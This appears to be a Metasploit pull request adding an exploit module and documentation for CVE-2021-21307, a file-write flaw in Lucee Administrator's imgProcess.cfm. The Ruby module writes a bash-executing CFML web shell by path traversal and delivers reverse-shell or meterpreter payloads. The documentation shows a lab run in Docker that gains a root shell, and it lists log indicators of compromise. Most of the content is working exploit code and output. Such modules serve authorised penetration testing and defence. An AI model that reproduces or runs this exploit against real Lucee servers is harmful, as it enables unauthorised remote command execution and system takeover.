### PR TITLE
Add Lucee Administrator CVE-2021-21307 exploit

### DIFF
--- a/documentation/modules/exploit/linux/http/lucee_admin_imgprocess_file_write.md
+++ b/documentation/modules/exploit/linux/http/lucee_admin_imgprocess_file_write.md
@@ -1,0 +1,160 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits an arbitrary file write in Lucee Administrator's
+`imgProcess.cfm` file to execute commands as the Tomcat user.
+
+### Setup
+
+Run the following [Docker] command to test Lucee **5.3.7.43**:
+
+`docker run -dp 8888:8888 lucee/lucee:5.3.7.43`
+
+[Docker]: https://hub.docker.com/r/lucee/lucee
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Scenarios
+
+### Lucee 5.3.7.43 in [Docker]
+
+```
+msf6 > use exploit/linux/http/lucee_admin_imgprocess_file_write
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/http/lucee_admin_imgprocess_file_write) > options
+
+Module options (exploit/linux/http/lucee_admin_imgprocess_file_write):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      8888             yes       The target port (TCP)
+   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /lucee           yes       Base path
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse_bash):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix Command
+
+
+msf6 exploit(linux/http/lucee_admin_imgprocess_file_write) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 exploit(linux/http/lucee_admin_imgprocess_file_write) > set lhost 172.16.57.1
+lhost => 172.16.57.1
+msf6 exploit(linux/http/lucee_admin_imgprocess_file_write) > run
+
+[*] Started reverse TCP handler on 172.16.57.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Lucee Administrator imgProcess.cfm detected.
+[*] Writing CFML stub: http://127.0.0.1:8888/lucee/2esdjIrVqvM.cfm
+[*] Executing cmd/unix/reverse_bash (Unix Command)
+[+] Deleted /opt/lucee/web/temp/admin-ext-thumbnails/__/../../../context/2esdjIrVqvM.cfm
+[+] Deleted /opt/lucee/web/temp/admin-ext-thumbnails/__/
+[*] Command shell session 1 opened (172.16.57.1:4444 -> 172.16.57.1:59439) at 2021-08-16 05:58:53 -0500
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+uname -a
+Linux 8c48d3e94284 5.10.25-linuxkit #1 SMP Tue Mar 23 09:27:39 UTC 2021 x86_64 GNU/Linux
+```
+
+## IOCs
+
+```
+==> /opt/lucee/server/lucee-server/context/logs/application.log <==
+"ERROR","http-nio-8888-exec-1","08/16/2021","11:55:02","controller","key [IMGSRC] doesn't exist;key [IMGSRC] doesn't exist;lucee.runtime.exp.ExpressionException: key [IMGSRC] doesn't exist
+	at lucee.runtime.type.util.StructSupport.invalidKey(StructSupport.java:67)
+	at lucee.runtime.type.StructImpl.get(StructImpl.java:139)
+	at imgprocess_cfm$cf.call(/admin/imgProcess.cfm:2)
+	at lucee.runtime.PageContextImpl._doInclude(PageContextImpl.java:945)
+	at lucee.runtime.PageContextImpl._doInclude(PageContextImpl.java:837)
+	at lucee.runtime.listener.ModernAppListener._onRequest(ModernAppListener.java:216)
+	at lucee.runtime.listener.MixedAppListener.onRequest(MixedAppListener.java:42)
+	at lucee.runtime.PageContextImpl.execute(PageContextImpl.java:2416)
+	at lucee.runtime.PageContextImpl._execute(PageContextImpl.java:2406)
+	at lucee.runtime.PageContextImpl.executeCFML(PageContextImpl.java:2381)
+	at lucee.runtime.engine.Request.exe(Request.java:43)
+	at lucee.runtime.engine.CFMLEngineImpl._service(CFMLEngineImpl.java:1170)
+	at lucee.runtime.engine.CFMLEngineImpl.serviceCFML(CFMLEngineImpl.java:1116)
+	at lucee.loader.engine.CFMLEngineWrapper.serviceCFML(CFMLEngineWrapper.java:97)
+	at lucee.loader.servlet.CFMLServlet.service(CFMLServlet.java:51)
+..."
+"ERROR","http-nio-8888-exec-2","08/16/2021","11:55:02","controller","Invalid file [/opt/lucee/web/temp/admin-ext-thumbnails/__/.];Invalid file [/opt/lucee/web/temp/admin-ext-thumbnails/__/.]
+Can't create file [/opt/lucee/web/temp/admin-ext-thumbnails/__/.];lucee.runtime.exp.ApplicationException: Invalid file [/opt/lucee/web/temp/admin-ext-thumbnails/__/.]
+	at lucee.runtime.tag.FileTag.checkFile(FileTag.java:1174)
+	at lucee.runtime.tag.FileTag.actionWrite(FileTag.java:678)
+	at lucee.runtime.tag.FileTag.doEndTag(FileTag.java:452)
+	at imgprocess_cfm$cf.call(/admin/imgProcess.cfm:2)
+	at lucee.runtime.PageContextImpl._doInclude(PageContextImpl.java:945)
+	at lucee.runtime.PageContextImpl._doInclude(PageContextImpl.java:837)
+	at lucee.runtime.listener.ModernAppListener._onRequest(ModernAppListener.java:216)
+	at lucee.runtime.listener.MixedAppListener.onRequest(MixedAppListener.java:42)
+	at lucee.runtime.PageContextImpl.execute(PageContextImpl.java:2416)
+	at lucee.runtime.PageContextImpl._execute(PageContextImpl.java:2406)
+	at lucee.runtime.PageContextImpl.executeCFML(PageContextImpl.java:2381)
+	at lucee.runtime.engine.Request.exe(Request.java:43)
+	at lucee.runtime.engine.CFMLEngineImpl._service(CFMLEngineImpl.java:1170)
+	at lucee.runtime.engine.CFMLEngineImpl.serviceCFML(CFMLEngineImpl.java:1116)
+	at lucee.loader.engine.CFMLEngineWrapper.serviceCFML(CFMLEngineWrapper.java:97)
+	at lucee.loader.servlet.CFMLServlet.service(CFMLServlet.java:51)
+..."
+
+==> /opt/lucee/web/logs/exception.log <==
+"Severity","ThreadID","Date","Time","Application","Message"
+"ERROR","http-nio-8888-exec-1","08/16/2021","11:55:02","","key [IMGSRC] doesn't exist;key [IMGSRC] doesn't exist;lucee.runtime.exp.ExpressionException: key [IMGSRC] doesn't exist
+	at lucee.runtime.type.util.StructSupport.invalidKey(StructSupport.java:67)
+	at lucee.runtime.type.StructImpl.get(StructImpl.java:139)
+	at imgprocess_cfm$cf.call(/admin/imgProcess.cfm:2)
+	at lucee.runtime.PageContextImpl._doInclude(PageContextImpl.java:945)
+	at lucee.runtime.PageContextImpl._doInclude(PageContextImpl.java:837)
+	at lucee.runtime.listener.ModernAppListener._onRequest(ModernAppListener.java:216)
+	at lucee.runtime.listener.MixedAppListener.onRequest(MixedAppListener.java:42)
+	at lucee.runtime.PageContextImpl.execute(PageContextImpl.java:2416)
+	at lucee.runtime.PageContextImpl._execute(PageContextImpl.java:2406)
+	at lucee.runtime.PageContextImpl.executeCFML(PageContextImpl.java:2381)
+	at lucee.runtime.engine.Request.exe(Request.java:43)
+	at lucee.runtime.engine.CFMLEngineImpl._service(CFMLEngineImpl.java:1170)
+	at lucee.runtime.engine.CFMLEngineImpl.serviceCFML(CFMLEngineImpl.java:1116)
+	at lucee.loader.engine.CFMLEngineWrapper.serviceCFML(CFMLEngineWrapper.java:97)
+	at lucee.loader.servlet.CFMLServlet.service(CFMLServlet.java:51)
+..."
+"ERROR","http-nio-8888-exec-2","08/16/2021","11:55:02","","Invalid file [/opt/lucee/web/temp/admin-ext-thumbnails/__/.];Invalid file [/opt/lucee/web/temp/admin-ext-thumbnails/__/.]
+Can't create file [/opt/lucee/web/temp/admin-ext-thumbnails/__/.];lucee.runtime.exp.ApplicationException: Invalid file [/opt/lucee/web/temp/admin-ext-thumbnails/__/.]
+	at lucee.runtime.tag.FileTag.checkFile(FileTag.java:1174)
+	at lucee.runtime.tag.FileTag.actionWrite(FileTag.java:678)
+	at lucee.runtime.tag.FileTag.doEndTag(FileTag.java:452)
+	at imgprocess_cfm$cf.call(/admin/imgProcess.cfm:2)
+	at lucee.runtime.PageContextImpl._doInclude(PageContextImpl.java:945)
+	at lucee.runtime.PageContextImpl._doInclude(PageContextImpl.java:837)
+	at lucee.runtime.listener.ModernAppListener._onRequest(ModernAppListener.java:216)
+	at lucee.runtime.listener.MixedAppListener.onRequest(MixedAppListener.java:42)
+	at lucee.runtime.PageContextImpl.execute(PageContextImpl.java:2416)
+	at lucee.runtime.PageContextImpl._execute(PageContextImpl.java:2406)
+	at lucee.runtime.PageContextImpl.executeCFML(PageContextImpl.java:2381)
+	at lucee.runtime.engine.Request.exe(Request.java:43)
+	at lucee.runtime.engine.CFMLEngineImpl._service(CFMLEngineImpl.java:1170)
+	at lucee.runtime.engine.CFMLEngineImpl.serviceCFML(CFMLEngineImpl.java:1116)
+	at lucee.loader.engine.CFMLEngineWrapper.serviceCFML(CFMLEngineWrapper.java:97)
+	at lucee.loader.servlet.CFMLServlet.service(CFMLServlet.java:51)
+..."
+```

--- a/modules/exploits/linux/http/lucee_admin_imgprocess_file_write.rb
+++ b/modules/exploits/linux/http/lucee_admin_imgprocess_file_write.rb
@@ -1,0 +1,196 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Lucee Administrator imgProcess.cfm Arbitrary File Write',
+        'Description' => %q{
+          This module exploits an arbitrary file write in Lucee Administrator's
+          imgProcess.cfm file to execute commands as the Tomcat user.
+        },
+        'Author' => [
+          'rootxharsh', # Discovery and PoC
+          'iamnoooob', # Discovery and PoC
+          'wvu' # Exploit
+        ],
+        'References' => [
+          ['CVE', '2021-21307'],
+          ['URL', 'https://dev.lucee.org/t/lucee-vulnerability-alert-november-2020-cve-2021-21307/7643'],
+          ['URL', 'https://github.com/lucee/Lucee/security/advisories/GHSA-2xvv-723c-8p7r'],
+          ['URL', 'https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md']
+        ],
+        'DisclosureDate' => '2021-01-15', # rootxharsh and iamnoooob's writeup
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix', 'linux'], # TODO: Windows?
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => false, # Tomcat user
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :linux_dropper,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 8888
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [
+            # /opt/lucee/server/lucee-server/context/logs/application.log
+            # /opt/lucee/web/logs/exception.log
+            IOC_IN_LOGS,
+            # /opt/lucee/web/temp/admin-ext-thumbnails/__/
+            # /opt/lucee/web/temp/admin-ext-thumbnails/__/../../../context/[a-zA-Z0-9]{8,16}.cfm
+            ARTIFACTS_ON_DISK
+          ]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/lucee'])
+    ])
+
+    register_advanced_options([
+      OptFloat.new('CmdExecTimeout', [true, 'Command execution timeout', 3.5])
+    ])
+  end
+
+  def check
+    # NOTE: This doesn't actually write a file
+    res = write_file(rand_text_alphanumeric(8..16), nil)
+
+    return CheckCode::Unknown unless res
+
+    unless res.code == 500 && res.body.include?("key [IMGSRC] doesn't exist")
+      return CheckCode::Safe
+    end
+
+    CheckCode::Appears('Lucee Administrator imgProcess.cfm detected.')
+  end
+
+  def exploit
+    print_status("Writing CFML stub: #{full_uri(cfml_uri)}")
+
+    unless write_cfml_stub
+      fail_with(Failure::NotVulnerable, 'Failed to write CFML stub')
+    end
+
+    print_status("Executing #{payload_instance.refname} (#{target.name})")
+
+    case target['Type']
+    when :unix_cmd
+      execute_command(payload.encoded)
+    when :linux_dropper
+      execute_cmdstager
+    end
+  end
+
+  def write_cfml_stub
+    # XXX: Create /opt/lucee/web/temp/admin-ext-thumbnails/__/
+    res = write_file('/.', '')
+
+    # Leak directory traversal base path from 500 response
+    unless res&.code == 500 && %r{file \[(?<base_path>.*?/__/)\.\]} =~ res.body
+      return false
+    end
+
+    register_dir_for_cleanup(base_path)
+
+    cfml_path = "/../../../context/#{cfml_filename}"
+
+    res = write_file(cfml_path, cfml_stub)
+
+    return false unless res&.code == 200
+
+    register_file_for_cleanup(normalize_uri(base_path, cfml_path))
+
+    true
+  end
+
+  def execute_command(cmd, _opts = {})
+    vprint_status(cmd)
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => cfml_uri,
+      'vars_post' => {
+        cfml_param => cmd
+      }
+    }, datastore['CmdExecTimeout'])
+
+    return unless res
+
+    fail_with(Failure::PayloadFailed, cmd) unless res.code == 200
+
+    vprint_line(res.body)
+  end
+
+  def write_file(name, contents)
+    opts = {
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/admin/imgProcess.cfm')
+    }
+
+    opts['vars_get'] = { 'file' => name } if name
+    opts['vars_post'] = { 'imgSrc' => contents } if contents
+
+    send_request_cgi(opts)
+  end
+
+  def cfml_stub
+    # https://cfdocs.org/cfscript
+    # https://cfdocs.org/cfexecute
+    <<~CFML.gsub(/^\s+/, '').tr("\n", '')
+      <cfscript>
+        cfexecute(name="/bin/bash", arguments=["-c", "#form.#{cfml_param}#"]);
+      </cfscript>
+    CFML
+  end
+
+  def cfml_uri
+    normalize_uri(target_uri.path, cfml_filename)
+  end
+
+  def cfml_param
+    @cfml_param ||= rand_text_alphanumeric(8..16)
+  end
+
+  def cfml_filename
+    @cfml_filename ||= "#{rand_text_alphanumeric(8..16)}.cfm"
+  end
+
+end


### PR DESCRIPTION
```
msf6 exploit(linux/http/lucee_admin_imgprocess_file_write) > info

       Name: Lucee Administrator imgProcess.cfm Arbitrary File Write
     Module: exploit/linux/http/lucee_admin_imgprocess_file_write
   Platform: Unix, Linux
       Arch: cmd, x86, x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2021-01-15

Provided by:
  rootxharsh
  iamnoooob
  wvu <wvu@metasploit.com>

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Unix Command
  1   Linux Dropper

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      8888             yes       The target port (TCP)
  SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT    8080             yes       The local port to listen on.
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /lucee           yes       Base path
  URIPATH                     no        The URI to use for this exploit (default is random)
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits an arbitrary file write in Lucee
  Administrator's imgProcess.cfm file to execute commands as the
  Tomcat user.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2021-21307
  https://dev.lucee.org/t/lucee-vulnerability-alert-november-2020-cve-2021-21307/7643
  https://github.com/lucee/Lucee/security/advisories/GHSA-2xvv-723c-8p7r
  https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md

msf6 exploit(linux/http/lucee_admin_imgprocess_file_write) >
```

_Apple WAF bypass not included._